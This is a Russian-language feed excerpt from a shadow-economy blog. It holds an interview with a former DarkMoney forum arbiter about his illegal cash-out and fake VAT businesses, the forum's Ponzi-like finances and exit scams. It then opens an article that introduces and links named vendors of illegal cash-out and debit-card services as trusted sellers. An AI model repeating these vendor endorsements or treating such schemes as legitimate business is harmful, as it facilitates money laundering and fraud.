  &lt;blockquote id=&quot;mZFF&quot;&gt;&lt;strong&gt;- Есть ли на форуме правила, которых Вы сами тайно нарушали — ради &amp;quot;высшей цели&amp;quot;?&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;c5eG&quot;&gt;&lt;strong&gt;Не особо понимаю формулировку &amp;quot;высшая цель&amp;quot;. Из правил я нарушал пожалуй только запрет на нецензурную лексику. И то , если правильно помню, напрямую в правилах он прописан никогда не был. Еще мог забанить какого-нибудь кидалу по косвенным признакам с формулировкой &amp;quot;Блокировка до прохождения проверки&amp;quot;. Что интересно, из всех таких забаненных не было ни одного прецедента чтобы человек обратился потом для прохождения проверки :)&lt;/strong&gt;&lt;/p&gt;
  &lt;figure id=&quot;Kly8&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e4/1a/e41aff2f-6fa6-4d47-9646-4edf564c4bb2.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Пример блокировки пользователя до прохождения проверки. P.S. &lt;strong&gt;TFS&lt;/strong&gt; Заблокировал скамера с вероятностью 99.9%&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;blockquote id=&quot;QcRc&quot;&gt;&lt;strong&gt;Были ли кризисы или желания уйти с проекта за всё это время?&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;OzA8&quot;&gt;&lt;strong&gt;Я выпадал с онлайна примерно на полгода в 2024-ом , мне надо было временно загаситься в связи с несколькими уголовными делами, изобразив уход на пенсию. Об этом я заранее поставил в известность администрацию.&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;mjFO&quot;&gt;&lt;strong&gt;У вас был источник дохода все это время? Многие члены АГ ведут коммерческую деятельность на форуме, вам не предлагали нечто подобное? &lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;EaF1&quot;&gt;&lt;strong&gt;Конечно был, я занимался &lt;a href=&quot;https://w98.darkmoney.in/belaya-obnalichka-84/chut-chut-analitiki-i-motivacii-dlya-teh-kto-hochet-zanyat-sya-belym-obnalom-159553/&quot; target=&quot;_blank&quot;&gt;белым обналом&lt;/a&gt;, &lt;a href=&quot;https://w98.darkmoney.in/belaya-obnalichka-84/chut-chut-analitiki-i-motivacii-dlya-teh-kto-hochet-zanyat-sya-belym-obnalom-159553/&quot; target=&quot;_blank&quot;&gt;консультациями по обналу&lt;/a&gt; и &lt;a href=&quot;https://w98.darkmoney.in/belaya-obnalichka-84/bumazhnyi-nds-146609/&quot; target=&quot;_blank&quot;&gt;бумажным НДС&lt;/a&gt;. Белый обнал я закрыл в конце 2023-го, а бумажным НДС и консультациями занимаюсь по сей день.&lt;/strong&gt;&lt;/p&gt;
  &lt;figure id=&quot;5u3M&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/dc/ea/dcea9ef4-ef3b-41ee-a36a-c0d95479767b.png&quot; width=&quot;1195&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote id=&quot;YZrT&quot;&gt;&lt;strong&gt;Как вы всё таки относились к своей работе, как хобби или как нечто большое? &lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;Lsyi&quot;&gt;&lt;strong&gt;К работе модератора и арбитра относился скорее как к хобби, т.к. мой доход как арбитра составлял копейки по сравнению с тем что приносил мне мой бизнес. А за работу модератора не платили вообще.&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;sBk3&quot;&gt;&lt;strong&gt;Форум ДМ за 12.5 лет стал одним из монополистов в сфере оказания теневых услуг и аккумулирует тысячи продавцов по всей планете, Вы чувствуете причастность к этому?&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;nWoJ&quot;&gt;&lt;strong&gt;Конечно. Почти всему что у меня сейчас есть в финансовом плане я обязан тем людям, с которыми познакомился на дарке.&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;DsKG&quot;&gt;&lt;strong&gt;Последним вопросом о воспоминаниях я хотел бы задать вопрос о Безопасности. Были ли Вы уверены, что форум не закроют, бенефициаров не посадят? За 12.5 лет ваше мнение сменилось?&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;fsrx&quot;&gt;&lt;strong&gt;Я всегда больше думал о собственной безопасности, на безопасность остальных если честно мне как-то фиолетово. Закрыть форум довольно сложно, т.к. блокировки РКН давно уже не дают какого-либо эффекта. Посадить бенефициаров - ну это их сначала надо сдеанонить и найти. Я довольно критически отношусь к имеющимся деанонам* которые щас активно разлетелись по теневым чатам, по мне это скорее заранее подготовленная дезинформация. Единственное, что у меня не бьется - если это утка, то почему по результату анализа их личностей вырисовываются довольно туповатые персонажи с мелкими судимостями? Нельзя было поумнее кого-то изобразить? Вот эта странность конечно наводит на соответствующие мысли...&lt;/strong&gt;&lt;/p&gt;
  &lt;section&gt;
    &lt;p id=&quot;xZDI&quot;&gt;В конце января 2025 года появился Телеграм Канал -&lt;a href=&quot;https://t.me/DaVinci_Komrakoff&quot; target=&quot;_blank&quot;&gt; Сотворение DarkMoney.&lt;/a&gt;&lt;/p&gt;
    &lt;p id=&quot;uAVv&quot;&gt;Суть канала - это рассказ об АГ форума DarkMoney. Различные выписки, пробивы, скрины.&lt;/p&gt;
    &lt;p id=&quot;ymAt&quot;&gt;Факты не выкладываются — лишь наблюдения. Выводы — за вами.&lt;/p&gt;
  &lt;/section&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;lIoc&quot;&gt;Перейдем к концу 2024 – начала 2025 года. На форуме начались появляться проблемы: задержки выплат депозитов, в многих разделах каша, апогей проблемы были задержки выплат по арбитражам. Холод администрации, удаление тем от негодования различными участниками.&lt;/h3&gt;
  &lt;figure id=&quot;o6Gu&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d4/2b/d42b61db-cf7e-4624-8967-68196ed93134.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote id=&quot;hlpq&quot;&gt;&lt;strong&gt;Чувствовали ли Вы тогда, что форум переживает не самое лучшее время или возможно это был «снежный ком»?&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;4k1H&quot;&gt;&lt;strong&gt;Конечно чувствовал. Тут на мой взгляд ситуация простейшая - нынешний владелец дарка очень сильно увеличил ту дыру которая у них была на момент передачи, тупо рассовав огромное количество бабла по карманам. В результате имеем классическую пирамиду, при которой все выплаты осуществлялись только за счет новых депозитов и денег за рекламу. &lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;5pfI&quot;&gt;&lt;strong&gt;Пока объемы росли все было нормально. Сейчас объемы уменьшились и перекрываться стало нечем. Возник типичный кризис доверия, когда после нескольких месяцев лечилова завтраками и всевозможным бредом пользователи наконец-то начали бунтовать.&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;dWeb&quot;&gt;&lt;strong&gt; Возможных выходов из этой ситуации возможно несколько, но есть два самых распространенных варианта. Первый - это продажа форума или доли в нем новым владельцам (как в свое время поступила команда Луки) и второй - это тянуть и доить остатки с последующим закрытием или превращением в скам-форум. &lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;AqR8&quot;&gt;&lt;strong&gt;Судя по&lt;a href=&quot;https://w98.darkmoney.in/novosti-proekta-11/zayavlenie-339014/&quot; target=&quot;_blank&quot;&gt; вчерашнему лечилову&lt;/a&gt; что все долги будут погашены в течение июня, был выбран второй вариант. Но разумеется все может поменяться, если за это время найдется кто-то, кто захочет забрать форум с гигантской дырищей в балансе. Поживем увидим как говорится :)&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;0os5&quot;&gt;&lt;strong&gt;Наверное такой стратегии можно было ожидать от АГ (не продажа, а доить остатки и превращаться в 2-й вариант). Насчёт дыры в балансе, по Вашему мнению эта сумма больше значительная, больше полу миллиона долларов?&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;Wbxe&quot;&gt;&lt;strong&gt;Полагаю да.&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;Nhmc&quot;&gt;&lt;strong&gt;Вы сказали, что в своё время команда Луки продала форум и доли в нём. Вам известно какая была цена? Как вы считаете, стоимость Дарка возросла, если поднимется речь о продаже в 2025. Во сколько Вы бы оценили Дарк, если это возможно?&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;mXvz&quot;&gt;&lt;strong&gt;Продажи долей не было, форум был передан полностью. Тогда его отдали за 10кк рублей, причем сделка была безденежной. Бывшие владельцы просто увеличили дыру, забрав эти деньги и после этого передали форум в новые руки. &lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;kncu&quot;&gt;&lt;strong&gt;Как будет сейчас - понятия не имею. Думаю сейчас весь этот месяц они будут усиленно искать варианты найти инвесторов, но я слабо представляю кто в здравом уме подпишется на такую авантюру, зная реальное положение дел. Хотя конечно, мамонтов в нашем мире припасено на века вперед, может кто-то и впишется, посмотрим...&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;ksUj&quot;&gt;&lt;strong&gt;Спасибо Богу, что мамонты еще не в красной книге)&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;blockquote id=&quot;h3Tb&quot;&gt;&lt;strong&gt;Раз уж мы заговорили о «возможных» негативных последствиях. Как Вы относитесь к &lt;a href=&quot;https://t.me/parabellum_clan1/217&quot; target=&quot;_blank&quot;&gt;экзит-скамам участников Дарка?&lt;/a&gt; Рекод по-моему был Бафет обнал, забравши чуть больше 200 тысяч долларов. Комьюнити подшучивают, что своё состояние можно увеличить в несколько раз, иногда десятков, поработавши на ДМ (завоевав доверие) и исчезнуть. &lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;QlkS&quot;&gt;&lt;strong&gt;На короткой дистации конечно, если для кого-то 200к баксов это те бабки которые представляют огромную ценность то они вполне логично выбирают такой вариант. Но на мой взгляд более прибыльно работать честно, развивая свой бизнес либо открывая новые направления.&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;r0GS&quot;&gt;&lt;strong&gt; 30.05.2025 &lt;a href=&quot;https://w98.darkmoney.in/novosti-proekta-11/o-nesootvetstvii-dolzhnosti-i-posledstviyah-338550/&quot; target=&quot;_blank&quot;&gt;Администратор DaVinci разжаловал Вас&lt;/a&gt; и еще 2 членов АГ , ссылаясь на «Утрату доверия». Как Вы отреагировал? &lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;jVXz&quot;&gt;Спокойно отреагировал - написал вот этот пост: &lt;a href=&quot;https://w98.darkmoney.in/1976856-post28.html&quot; target=&quot;_blank&quot;&gt;https://w98.darkmoney.in/1976856-post28.html&lt;/a&gt;&lt;/p&gt;
  &lt;figure id=&quot;pCjw&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/c4/2f/c42f3bb6-240a-4b4a-be67-4d72da89213f.png&quot; width=&quot;798&quot; /&gt;
    &lt;figcaption&gt;&lt;a href=&quot;https://w98.darkmoney.in/1976856-post28.html&quot; target=&quot;_blank&quot;&gt;https://w98.darkmoney.in/1976856-post28.html&lt;/a&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;qWOP&quot;&gt;Если увольнять за честность - это &amp;quot;несоответстие должности арбитра&amp;quot;, то да, я полностью согласен что мне тоже не по пути с такой командой. Я уж лучше как нибудь сам :)&lt;/p&gt;
  &lt;blockquote id=&quot;5Pbh&quot;&gt;&lt;strong&gt;Согласны.&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;blockquote id=&quot;k3G4&quot;&gt;&lt;strong&gt;В 2025 году на форуме появился раздел &amp;quot;курьеры, заборы наличных&amp;quot;. До этого работа с курьерами была строго запрещена. Это большое бюджетое наполнение. Не проводили ли параллель, что из форума выжимают &amp;quot;все соки&amp;quot;?&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;WkLc&quot;&gt;&lt;strong&gt;Возможно так оно и есть. Но в целом я в этом никакого нарушения логики не вижу. Я вообще к любым рода запретам отношусь крайне скептично. Запреты это мусорская тема. Запрещать что-либо в дарке, где 99% торговых тем это уже сама по себе статья - ну это такое себе на мой взгляд... Другое дело что иногда нужно ограничивать что-то исходя из эффективности или безопасности. &lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;hGXR&quot;&gt;&lt;strong&gt;Так например при Луке на форуме была строго запрещена работа по USA. Новые владельцы кстати этот запрет сняли, но к какому-либо значимому росту этого направления это не привело, т.к. форум разумеется изначально заточен на русскоговорящую аудиторию.&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;FYQo&quot;&gt;&lt;strong&gt;Вы считаете, вас &amp;quot;убрали&amp;quot; за позицию — или просто потому, что стало выгодно? &lt;/strong&gt;&lt;/blockquote&gt;
  &lt;blockquote id=&quot;Kfsb&quot;&gt;&lt;strong&gt;В комментариях к посту Вы упоминаете диалог с участником форума, которому без &lt;a href=&quot;https://w98.darkmoney.in/1976856-post28.html&quot; target=&quot;_blank&quot;&gt;«розовых очков»&lt;/a&gt; сказали дедлайны вывода депозита. Почему из-за него Вас сняли?&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;wCJu&quot;&gt;&lt;strong&gt;Я считаю что у DaVinci просто подгорает от текущей ситуации. Ну представьте - почти 5 лет вы набивали карманы баблом в промышленных масштабах. В какой-то момент от этого у любого человека может снести крышу и он может себя почувствовать примерно как обкокаиненый Тони Монтана в культовом фильме &amp;quot;Лицо со шрамом&amp;quot;. Там будет не только &amp;quot;The world is mine&amp;quot; , там чел себя богом возомнит легко. А теперь все схлопывается. Нового бабла нету. Ну точнее немного может и есть, но по сравнению с тем что было - копейки. &lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;4nOU&quot;&gt;&lt;strong&gt;Перспективы неясные. Народ требует бабло назад. Дырища огромная, собственными средствами ее закрывать не вариант - все давно прокайфовано. Ну что вы будете делать в такой ситуации? Отыгрываться на персонале. Типа кризисное управление - уберем несогласных , оставим жополизов. Это обычная человеческая логика в такой ситуации.&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;eCOa&quot;&gt;&lt;strong&gt;Хочу перебить Вас, извините, а известно сколько зарабатывала АГ в пике и сейчас? Если речь идёт о крупных суммах и почему у членов АГ не было «неформальных» офферов по зарплате, бонусов чего-то еще?&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;UFqv&quot;&gt;&lt;strong&gt;Если речь идет о зарплате именно за работу в АГ - то это копейки. За работу Арбитром я получал арбитражные пошлины в случае если сделка рассматриваемая в арбитраже проводилась без Гаранта. Если в деньгах, то в среднем это было примерно 200-300 долларов в месяц. Сделки с Гарантом рассматриваются арбитрами бесплатно. За работу модератором вообще не платили. Как бонусы были только прилепленные в разделе торговые темы и возможность бесплатного размещения рекламных баннеров в своей подписи.&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;nmA5&quot;&gt;&lt;strong&gt;Забавно, что следующий вопрос качается некоторых участников АГ. А Жополизов много среди АГ? По нашему мнению некоторые даже не прячутся)&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;mFjz&quot;&gt;&lt;strong&gt;Конечно их хватает. Чем меньше человек зарабатывает, тем больше ему приходится лизать жопу начальству, в надежде на какие-то свои выгоды. Посмотрите чем занимаются те, кто не участвует в подлизывании - например Creader, Готти , Тарантино - все они нальщики грязи, соответственно на комфортную жизнь им думаю вполне хватает и без этого..&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;fFo0&quot;&gt;&lt;strong&gt;Арбитр «Федотов» &lt;a href=&quot;https://w98.darkmoney.in/novosti-proekta-11/o-nesootvetstvii-dolzhnosti-i-posledstviyah-338550/index5.html&quot; target=&quot;_blank&quot;&gt;писал в этом же посте о корпоративной этике&lt;/a&gt;, что нужно беречь репутацию форума, не распускать слухи. «Лучшем решение будем сообщить АГ выше и решить проблему в корне», писал Федотов. Вы что-то предпринимали, а самое главное Вас слышала администрация? &lt;/strong&gt;&lt;/blockquote&gt;
  &lt;figure id=&quot;X5bc&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/21/64/2164ec37-2f6b-423e-8bae-621ee499b774.png&quot; width=&quot;1160&quot; /&gt;
    &lt;figcaption&gt;Заявления Арбитра-Члена АГ о разжаловании 3-х участников АГ.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;5lsU&quot;&gt;&lt;strong&gt;Что я могу предпринять? Никакого доступа к управлению или финансам у арбитров нету. Слухи распускать? Т.е. то что я озвучил общедоступную информацию, которую легко можно проверить в разделе Выводы депозитов это уже называется &amp;quot;распускать слухи&amp;quot;??? Федотов просто как всегда занимается демагогией и словоблудством&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;yC5x&quot;&gt;&lt;strong&gt;Какие на Ваш счёт были проблемы, ошибки АГ форума? Многие участники на Вашей стороне не из-за «корпоративной этике», а из-за суровой правды.&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;shbo&quot;&gt;&lt;strong&gt;Суровая правда в том, что при Луке модерку могли отобрать за неодобрение тем в разделе Оценка АГ. А сейчас, как я понимаю Allino4ka и Mrpink сняли за то, что они ОДОБРЯЛИ там темы ))) Мне такая &amp;quot;корпоративная этика&amp;quot; совершенно не нравится. Собственно и Берия ушел как мне кажется из-за этого же.&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;nguo&quot;&gt;&lt;strong&gt;Помимо раздела &amp;quot;Оценка АГ&amp;quot;, какие рычаги может предпринять пласт продавцов у которых застряли большие суммы денег? В данный момент ожидание выводов доходять чуть ли не на пол года. Подскажешь?&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;Gr0r&quot;&gt;&lt;strong&gt;Им трудно что-то сделать. Что они могут? Жаловаться в спортлото? Есть вот такой канал &amp;quot;&lt;a href=&quot;https://t.me/ArbitrajDarkmoney&quot; target=&quot;_blank&quot;&gt;Арбитраж к форуму DarkMoney&lt;/a&gt;&amp;quot; , там один из пользователей у которого застряло 2,5кк выкладывает актуальную инфу по ситуации. Что еще можно сделать - ну наверное не молчать, а активно участвовать в обсуждении данной ситуации.&lt;/strong&gt;&lt;/p&gt;
  &lt;figure id=&quot;n1va&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f7/28/f72815fc-18ef-4365-9202-0cdc376982f4.png&quot; width=&quot;771&quot; /&gt;
    &lt;figcaption&gt;ТС заявляет, что канал хотят специально снести, накручивая под-ков.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;blockquote id=&quot;jxmY&quot;&gt;&lt;strong&gt;Знаем такой канал, его создатель нам так же писал. Наблюдаем ситуацию.&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;blockquote id=&quot;GKfR&quot;&gt;&lt;strong&gt;Вернемся к «бенефициарам» ДМ. Комракоф и ДаВинчи, активно участвовали в работе ДМ? В какой момент всё пошло на перекосяк?&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;7KX0&quot;&gt;&lt;strong&gt;Я не могу судить насколько они активно участвовали. Судя по той дыре которая щас есть, бабло по карманам они точно очень активно распихивали. &lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;kuMe&quot;&gt;&lt;strong&gt;Наперекосяк все пошло в начале 2025-го , когда появились первые задержки. Поначалу они были не очень особо заметны, но потом все стало нарастать, пока наконец не народ не выдержал такого.&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;o3HN&quot;&gt;&lt;strong&gt;Мы сможем увидеть Вас на ДМ среди АГ вновь?)&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;CI2w&quot;&gt;&lt;strong&gt;Если будет смена владельца и он захочет видеть меня в составе АГ - то почему нет, это вполне возможный вариант.&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;XlNk&quot;&gt;&lt;strong&gt;Как Ваши успехи в «Белом обнале» и «Бумажном НДС», ДМ дал приток твоим направлениям? Какие планы на будущие? Не планировал завязать с теневым сектором и уйти в другое русло?)&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;ZIAy&quot;&gt;&lt;strong&gt;Как я уже говорил, белый обнал я закрыл в конце 2023-го года. Бумажный НДС продолжаю вести, сильно много времени это не занимает, т.к. там все хорошо автоматизировано. Планы на будущее - я рассматриваю создание нескольких возможных проектов, но все упирается в команду. Собрать хорошую команду с нуля довольно непростая задача. Поэтому пока в режиме творческого поиска.&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;61wM&quot;&gt;Это правда, что Вы бы хотели стать гарантом? У Вас ведь есть опыт?&lt;/blockquote&gt;
  &lt;p id=&quot;gWds&quot;&gt;Да, это перспективная тема. Меня уже сделали гарантом в чате &lt;a href=&quot;https://t.me/+ZLTf2skfIkkyMzMy&quot; target=&quot;_blank&quot;&gt;Проводная &lt;/a&gt; Сейчас веду переговоры с другими чатами по этому поводу.&lt;/p&gt;
  &lt;blockquote id=&quot;e4ZV&quot;&gt;&lt;strong&gt;Хотим пожелать Вам удачи в Ваших новых статусах, спасибо за интервью!&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;pAmK&quot;&gt;Взаимно.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;Sb5C&quot;&gt;💬 Поддержите проект&lt;/h3&gt;
  &lt;p id=&quot;FV7D&quot;&gt;Если материал был вам полезен — поставьте лайк, поделитесь в каналах с коллегами или друзьями.&lt;/p&gt;
  &lt;p id=&quot;Eumf&quot;&gt;🧠 Лучшая благодарность — это развитие проекта вместе с вами. &lt;a href=&quot;http://t.me/dark_gov&quot; target=&quot;_blank&quot;&gt;Вступайте в наши ряды&lt;/a&gt; и следите за новыми выпусками — мы не остановимся.&lt;/p&gt;
  &lt;p id=&quot;Jwgm&quot;&gt;&lt;em&gt;Спасибо, что остаетесь на волне.&lt;/em&gt;&lt;/p&gt;
  &lt;p id=&quot;KDZv&quot;&gt;Поддержка проекта:&lt;/p&gt;
  &lt;blockquote id=&quot;Wf9S&quot;&gt;TRC20: TLSttEVXCDSJWWZ775cUvfrafYYgz2Ha4Q BTC: bc1qvrwn96agxtmyflxkjsefazzjvsp2gnc8e58zmg&lt;/blockquote&gt;

</content></entry><entry><id>parabellum_clan:Vojna_protiv_dropov</id><link rel="alternate" type="text/html" href="https://teletype.in/@parabellum_clan/Vojna_protiv_dropov?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=parabellum_clan"></link><title>«Война против дропов»: как рынок обнала и дебета переживает уголовный перелом.</title><published>2025-06-17T09:44:18.179Z</published><updated>2025-06-17T09:44:52.213Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img1.teletype.in/files/0b/0f/0b0f45e8-3f8e-4b0b-8f41-5b6b166d0688.png"></media:thumbnail><category term="ekspertnye-stat-i" label="Экспертные статьи"></category><summary type="html">&lt;img src=&quot;https://img1.teletype.in/files/0e/f4/0ef43fcc-1c06-48fe-8723-081f6b1d6abc.png&quot;&gt;Тепло приветствуем, дамы и господа! С Вами вновь Сообщество экспертов - Parabellum Clan и его корреспондент Генри. Сегодня мы разберем с нашими Экспертными Гостями последние события на рынке обнала и дебета в новых реалиях. Как повлияют будущие законопроекты, действующее поправки к законам и в каких реалиях работают Эксперты в 2025 году?</summary><content type="html">
  &lt;figure id=&quot;nSez&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/0e/f4/0ef43fcc-1c06-48fe-8723-081f6b1d6abc.png&quot; width=&quot;1032&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ztDP&quot;&gt;Тепло приветствуем, дамы и господа! С Вами вновь Сообщество экспертов - &lt;strong&gt;&lt;a href=&quot;https://t.me/+ize7XDFxbMNjNDg0&quot; target=&quot;_blank&quot;&gt;Parabellum Clan&lt;/a&gt;&lt;/strong&gt; и его корреспондент &lt;a href=&quot;http://t.me/god_freska&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Генри.&lt;/strong&gt;&lt;/a&gt; Сегодня мы разберем с нашими Экспертными Гостями последние события на рынке обнала и дебета в новых реалиях. Как повлияют будущие законопроекты, действующее поправки к законам и в каких реалиях работают Эксперты в 2025 году?&lt;/p&gt;
  &lt;p id=&quot;4glp&quot;&gt;Перед началом хочу представить наших гостей:&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;ul id=&quot;VRUZ&quot;&gt;
      &lt;li id=&quot;rFFL&quot;&gt;&lt;strong&gt; &lt;a href=&quot;http://t.me/finance_112&quot; target=&quot;_blank&quot;&gt;Finance112&lt;/a&gt; , Советник, без чьего взгляда на вещи многие механизмы остались бы в тени. Одного из наиболее авторитетных аналитиков в сфере финансовых теневых механизмов. Его способность разложить по полочкам даже самые сложные материи — неоценима. Мы признательны, что он присоединился к обсуждению.&lt;/strong&gt;&lt;/li&gt;
      &lt;li id=&quot;Rm2R&quot;&gt;&lt;strong&gt;&lt;a href=&quot;https://t.me/MoneyMusk&quot; target=&quot;_blank&quot;&gt;MoneyMusk&lt;/a&gt; , человек, о котором в узких кругах говорят с уважением и без лишнего шума — наш &lt;a href=&quot;https://w98.darkmoney.in/obnal-zalivy-rossiya-22/moneymusk-kanal-pro-obnal-rossiya-i-sng-merchanty-eu-sepa-skam-ip-i-ooo-p2p-cash-nfc-akciya-ot-0-2024-a-239608/index22.html&quot; target=&quot;_blank&quot;&gt;проверенный партнёр&lt;/a&gt;, один из топовых продавцов на рынке обнала . Его имя давно стало гарантией стабильности, аккуратности. Для наших читателей он подготовил небольшой, но весьма приятный сюрприз.&lt;/strong&gt;&lt;/li&gt;
      &lt;li id=&quot;giFO&quot;&gt;&lt;strong&gt;&lt;a href=&quot;https://t.me/Kommers_RR&quot; target=&quot;_blank&quot;&gt;Коммерсант&lt;/a&gt; , слово за человеком, чьим картам доверяют, как себе. Тот самый &lt;a href=&quot;https://w98.darkmoney.in/debetovye-karty-23/garantiinye-debetovye-karty-rf-karty-na-vashi-fio-ot-kommersanta-260869/&quot; target=&quot;_blank&quot;&gt;проверенный продавец&lt;/a&gt;, который не суетится, не орёт в рекламе — просто делает своё дело так, что по дебетовым связкам его советуют молча, по звонку.&lt;/strong&gt;&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;Omz1&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/c5/8c/c58c08f8-2941-47ec-915c-3251b99ca2c0.png&quot; width=&quot;1920&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;175U&quot;&gt;&lt;strong&gt;Содержание:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;fFip&quot;&gt;&lt;a href=&quot;/@parabellumclan/EwW4XiPXxAO#rbUD&quot;&gt;1. Как новый закон врезал по дропам — и кто следующий?&lt;/a&gt;                                          &lt;a href=&quot;/@parabellumclan/EwW4XiPXxAO#kLfr&quot;&gt;2. Губительно ли это для дропов — или они ещё успеют сбежать?&lt;/a&gt;                                 &lt;a href=&quot;/@parabellumclan/EwW4XiPXxAO#UEYJ&quot;&gt;3. Какие шаги готовит система — и где ударит следующий молоток? &lt;/a&gt;                       &lt;a href=&quot;/@parabellumclan/EwW4XiPXxAO#V856&quot;&gt;4. Обнал уходит в тень — или просто меняет лицо?&lt;/a&gt;                                                       &lt;a href=&quot;/@parabellumclan/EwW4XiPXxAO#QUw4&quot;&gt;5. Как реагируют обнал-сервисы: страх, затишье или новая смета?&lt;/a&gt;                           &lt;a href=&quot;/@parabellumclan/EwW4XiPXxAO#29ml&quot;&gt;6. Что предпринимают обнал-сервисы? Профилактика или адаптация?&lt;/a&gt;                      &lt;a href=&quot;/@parabellumclan/EwW4XiPXxAO#fLKY&quot;&gt;7. Рынок обнала завтра: консолидация, закат или новая кровь?&lt;/a&gt;                                 &lt;a href=&quot;/@parabellumclan/EwW4XiPXxAO#hcbb&quot;&gt;8. Что значит &amp;quot;война с дропами&amp;quot; — и кто теперь в прицеле?&lt;/a&gt;                                          &lt;a href=&quot;/@parabellumclan/EwW4XiPXxAO#JqxU&quot;&gt;9. Рынок дебета на грани — финал или ребрендинг?&lt;/a&gt;&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h3 id=&quot;rbUD&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;1. Как новый закон врезал по дропам — и кто следующий? &lt;/strong&gt;&lt;/h3&gt;
  &lt;/section&gt;
  &lt;blockquote id=&quot;Bqpa&quot;&gt;Советник,приветствую, как повлияет уже принятые поправки в законодательство ужесточающие ответственность дропов на рынок обнала?&lt;/blockquote&gt;
  &lt;p id=&quot;zz8I&quot;&gt;Здравствуй, Генри.&lt;/p&gt;
  &lt;p id=&quot;V30k&quot;&gt;В краткосрочной перспективе существенных структурных изменений на рынке не предвидится. Ключевая проблема заключается в низком уровне осознания дропами правовых рисков, связанных с пере-дачей электронных средств платежа (ЭСП) третьим лицам. Их решения часто продиктованы сиюми-нутной финансовой выгодой, на которую ужесточение санкций само по себе повлияет ограниченно.&lt;/p&gt;
